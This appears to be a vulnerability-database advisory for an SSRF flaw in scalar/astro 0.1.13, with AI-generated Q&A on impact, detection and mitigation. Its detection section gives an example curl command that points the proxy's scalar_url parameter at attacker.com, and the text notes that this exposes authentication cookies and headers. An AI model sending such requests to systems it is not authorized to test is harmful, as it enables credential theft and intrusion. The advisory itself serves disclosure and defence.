CVE-2026-30118
Server-Side Request Forgery in Scalar Astro
Publication date: 2026-05-19
Last updated on: 2026-05-20
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| scalar | astro | 0.1.13 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in scalar/astro v0.1.13 allows unauthenticated attackers to expose authentication cookies and headers, and potentially escalate privileges. Such exposure of sensitive authentication data could lead to unauthorized access to protected information.
This kind of unauthorized access and data exposure may impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.
Can you explain this vulnerability to me?
The vulnerability in scalar/astro v0.1.13 is a Server-Side Request Forgery (SSRF) found in the scalar_url query parameter of the Scalar Proxy endpoint.
This flaw allows unauthenticated attackers to make the backend server send HTTP requests to URLs controlled by the attacker.
As a result, attackers can expose authentication cookies and headers, which may lead to privilege escalation.
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to gain unauthorized access to sensitive authentication information such as cookies and headers.
With this information, attackers might escalate their privileges within the system, potentially compromising the security and integrity of your backend server.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this SSRF vulnerability involves monitoring for unusual HTTP requests originating from the backend server to attacker-controlled URLs, especially those involving the scalar_url query parameter in the Scalar Proxy endpoint.
You can use network monitoring tools or web server logs to identify suspicious outbound requests. Additionally, the GitHub repository linked provides resources that may help in detection or exploitation testing.
- Use curl or wget commands to test the scalar_url parameter by sending crafted requests and observing server behavior.
- Example curl command to test the vulnerability: curl -v 'http://<target>/scalar_proxy?scalar_url=http://attacker.com'
- Monitor backend server logs for unexpected outbound HTTP requests to external or attacker-controlled domains.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or validating the scalar_url parameter to prevent SSRF attacks.
Implement input validation and sanitization to ensure that only allowed URLs or internal addresses can be requested by the backend.
Additionally, apply network-level controls such as firewall rules to block outbound requests from the backend server to untrusted external addresses.
Review and update the scalar/astro application to a patched version once available.